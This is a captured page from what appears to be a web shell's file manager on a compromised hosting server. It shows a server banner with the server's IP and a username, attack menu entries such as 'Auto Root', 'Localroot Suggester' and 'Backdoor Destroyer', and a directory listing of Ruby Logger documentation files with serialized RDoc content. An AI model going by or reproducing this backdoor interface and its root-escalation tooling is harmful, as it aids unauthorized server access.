Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
Logger /
Delete
Unzip
Name
Size
Permission
Date
Action
Formatter
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
LogDevice
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Period
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Severity
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
%3c%3c-i.ri
366
B
-rw-r--r--
2023-07-26 18:33
add-i.ri
2
KB
-rw-r--r--
2023-07-26 18:33
cdesc-Logger.ri
8.92
KB
-rw-r--r--
2023-07-26 18:33
close-i.ri
287
B
-rw-r--r--
2023-07-26 18:33
datetime_format%3d-i.ri
515
B
-rw-r--r--
2023-07-26 18:33
datetime_format-i.ri
340
B
-rw-r--r--
2023-07-26 18:33
debug%3f-i.ri
361
B
-rw-r--r--
2023-07-26 18:33
debug-i.ri
379
B
-rw-r--r--
2023-07-26 18:33
error%3f-i.ri
361
B
-rw-r--r--
2023-07-26 18:33
error-i.ri
380
B
-rw-r--r--
2023-07-26 18:33
fatal%3f-i.ri
361
B
-rw-r--r--
2023-07-26 18:33
fatal-i.ri
379
B
-rw-r--r--
2023-07-26 18:33
format_message-i.ri
276
B
-rw-r--r--
2023-07-26 18:33
format_severity-i.ri
253
B
-rw-r--r--
2023-07-26 18:33
formatter-i.ri
1.02
KB
-rw-r--r--
2023-07-26 18:33
info%3f-i.ri
358
B
-rw-r--r--
2023-07-26 18:33
info-i.ri
1.46
KB
-rw-r--r--
2023-07-26 18:33
level%3d-i.ri
517
B
-rw-r--r--
2023-07-26 18:33
level-i.ri
306
B
-rw-r--r--
2023-07-26 18:33
log-i.ri
273
B
-rw-r--r--
2023-07-26 18:33
new-c.ri
1.9
KB
-rw-r--r--
2023-07-26 18:33
progname-i.ri
297
B
-rw-r--r--
2023-07-26 18:33
reopen-i.ri
763
B
-rw-r--r--
2023-07-26 18:33
sev_threshold%3d-i.ri
267
B
-rw-r--r--
2023-07-26 18:33
sev_threshold-i.ri
322
B
-rw-r--r--
2023-07-26 18:33
unknown-i.ri
453
B
-rw-r--r--
2023-07-26 18:33
warn%3f-i.ri
358
B
-rw-r--r--
2023-07-26 18:33
warn-i.ri
376
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI"add:ETI"Logger#add;TF:publico:RDoc::Markup::Document:@parts[S:RDoc::Markup::Heading: leveli: textI" Args;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[ o:RDoc::Markup::ListItem:@label[I"+severity+;T; [o:RDoc::Markup::Paragraph; [I"LSeverity. Constants are defined in Logger namespace: +DEBUG+, +INFO+, ;TI",+WARN+, +ERROR+, +FATAL+, or +UNKNOWN+.;To;;[I"+message+;T; [o;; [I"-The log message. A String or Exception.;To;;[I"+progname+;T; [o;; [I"GProgram name string. Can be omitted. Treated as a message if no ;TI"%+message+ and +block+ are given.;To;;[I"+block+;T; [o;; [I"ICan be omitted. Called to get a message string if +message+ is nil.;T@ S; ;i;I"Return;T@ o;; [I"NWhen the given severity is not high enough (for this particular logger), ;TI"'log no message, and return +true+.;T@ S; ;i;I"Description;T@ o;; [I"NLog a message if the given severity is high enough. This is the generic ;TI"Ologging method. Users will be more inclined to use #debug, #info, #warn, ;TI"#error, and #fatal.;T@ o;; [I"J<b>Message format</b>: +message+ can be any object, but it has to be ;TI"Mconverted to a String in order to log it. Generally, +inspect+ is used ;TI"*if the given object is not a String. ;TI"OA special case is an +Exception+ object, which will be printed in detail, ;TI"Dincluding message, class, and backtrace. See #msg2str for the ;TI" implementation if required.;T@ S; ;i;I" Bugs;T@ o;;:BULLET;[o;;0; [o;; [I"Logfile is not locked.;To;;0; [o;; [I",Append open does not need to lock file.;To;;0; [o;; [I"AIf the OS supports multi I/O, records possibly may be mixed.;T: @fileI"lib/logger.rb;T:0@omit_headings_from_table_of_contents_below0I"ALogger#add(severity, message = nil, progname = nil) { ... } ;TI"